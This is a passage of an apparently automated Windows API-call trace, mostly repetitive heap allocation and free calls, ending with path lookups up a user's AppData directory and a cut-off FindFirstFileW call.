hHeap=0x620000) returned 1 [0202.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0202.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.920] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0202.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0202.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.920] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0202.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0202.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0202.921] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0202.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d50 [0202.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0202.921] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0202.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1d50 | out: hHeap=0x620000) returned 1 [0202.922] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0202.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0202.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.922] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0202.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0202.923] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0202.923] PathFindFileNameW (pszPath="") returned="" [0202.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0202.923] FindFirstFileW (in: 